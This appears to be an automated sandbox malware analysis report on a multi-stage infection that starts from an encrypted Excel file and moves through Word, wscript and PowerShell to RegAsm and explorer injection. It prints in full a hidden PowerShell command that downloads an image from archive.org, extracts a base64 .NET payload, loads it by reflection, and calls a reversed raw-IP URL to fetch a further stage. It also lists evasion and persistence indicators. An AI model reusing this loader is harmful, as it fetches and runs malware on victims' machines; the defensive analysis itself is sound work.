            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: D:\New Private Panell Src 3.0\Rump Updated FIX C#\src\obj\Debug\dnlib.pdb source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: 96630000.0.dr Initial sample: OLE indicators vbamacros = False
            Source: 40830001.xls Initial sample: OLE indicators encrypted = True

            Data Obfuscation

            Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '[garbled encoded payload omitted]'
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.VFEW/09/61.841.49.32//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? 
?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.VFEW/09/61.841.49.32//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 19_2_00129247 LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,19_2_00129247
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 13_2_00302DB5 pushad ; ret 13_2_00302DC9
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 13_2_00302DD0 pushfd ; ret 13_2_00302DD9
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 13_2_00300F45 push ebx; iretd 13_2_00300F62
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_0040134A pushfd ; retf 14_2_00401353
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_004012F2 pushfd ; retf 14_2_004012F3
            Source: C:\Windows\explorer.exe | Code function: 20_2_00061405 push esi; ret 20_2_00061407
            Source: C:\Windows\explorer.exe | Code function: 20_2_000647A7 push esp; iretd 20_2_000647A8
            Source: C:\Windows\explorer.exe | Code function: 20_2_000614D4 push esi; ret 20_2_000614D6
            Source: C:\Windows\explorer.exe | Code function: 20_2_0006A055 push es; iretd 20_2_0006A05D
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 21_2_000838A7 push esp; iretd 21_2_000838A8
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 21_2_0008967E push ds; retf 21_2_00089680
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 21_2_000894E6 push edx; ret 21_2_000894E7
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 22_2_000887CE push es; ret 22_2_00088A18
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 22_2_00088EEF push edi; ret 22_2_00088EF0
            Source: C:\Windows\explorer.exe | Code function: 23_2_000E1405 push esi; ret 23_2_000E1407
            Source: C:\Windows\explorer.exe | Code function: 23_2_000E14D4 push esi; ret 23_2_000E14D6
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 24_2_00083417 push esp; iretd 24_2_00083418
            Source: C:\Windows\explorer.exe | Code function: 25_2_000E1405 push esi; ret 25_2_000E1407
            Source: C:\Windows\explorer.exe | Code function: 25_2_000E45A7 push esp; iretd 25_2_000E45A8
            Source: C:\Windows\explorer.exe | Code function: 25_2_000E14D4 push esi; ret 25_2_000E14D6
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 26_2_00083627 push esp; iretd 26_2_00083628
            Source: C:\Windows\explorer.exe | Code function: 27_2_000EAC8D push esp; iretd 27_2_000EAC95
            Source: C:\Windows\explorer.exe | Code function: 27_2_000EAAD2 push ebp; iretd 27_2_000EAAD3
            Source: C:\Windows\explorer.exe | Code function: 27_2_000E1405 push esi; ret 27_2_000E1407
            Source: C:\Windows\explorer.exe | Code function: 27_2_000E14D4 push esi; ret 27_2_000E14D6

            Persistence and Installation Behavior

            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: \Device\RdpDr\;:1\crash.sh@SSL\DavWWWRoot
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File dump: inetmecangetbackwithentirethingstobefinewithmesheisnicegirlwholovetodrivethemagicofnicepersonwithmegreatthingshappeningwith_________goodgirlgreatday[1].doc.0.dr
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File dump: EADD419E.doc.4.dr
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Section loaded: netapi32.dll and davhlpr.dll loaded
            Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Roaming\dagifhd

            Hooking and other Techniques for Hiding and Protection

            Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Roaming\dagifhd:Zone.Identifier read attributes | delete
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 22_2_00083862 GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpi,lstrcmpi,GetCommandLineW,CommandLineToArgvW,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpi,lstrcmpi,lstrcmpi,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpi,GetCommandLineA,StrStrIA,lstrcmpi,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpi,CreateToolhelp32Snapshot,Process32First,CloseHandle,Sleep,22_2_00083862
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\taskeng.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\dagifhd | Process information set: NOOPENFILEERRORBOX
            Source: 40830001.xlsStream path 'Workbook' entropy: 7.99935437344 (max. 8.0)
            Source: 96630000.0.drStream path 'Workbook' entropy: 7.99934388438 (max. 8.0)
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Malware Analysis System Evasion

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\IDE (2 identical entries)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI (2 identical entries)
Source: C:\Windows\SysWOW64\explorer.exe Code function: GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpi,lstrcmpi,GetCommandLineW,CommandLineToArgvW,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpi,lstrcmpi,lstrcmpi,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpi,GetCommandLineA,StrStrIA,lstrcmpi,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpi,CreateToolhelp32Snapshot,Process32First,CloseHandle,Sleep, 22_2_00083862
Source: C:\Windows\SysWOW64\explorer.exe Evasive API call chain: CreateMutex,DecisionNodes,Sleep graph_24-890
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe API/Special instruction interceptor: Address: 7731C7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe API/Special instruction interceptor: Address: 7731BFFA
Source: C:\Users\user\AppData\Roaming\dagifhd Memory allocated: 260000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\dagifhd Memory allocated: 24A0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\dagifhd Memory allocated: 390000 memory reserve | memory write watch
Source: C:\Windows\SysWOW64\explorer.exe Code function: 22_2_000816C7 GetCurrentProcessId,GetCurrentThreadId,CreateToolhelp32Snapshot,Thread32First,OpenThread,SuspendThread,ResumeThread,CloseHandle,Thread32Next,CloseHandle, 22_2_000816C7
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 (2 identical entries)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 599704
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 600000 (2 identical entries)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\dagifhd Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 896
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1884
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1575
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3764
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 501
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 614
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 771
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 4016 Thread sleep time: -120000s >= -30000s
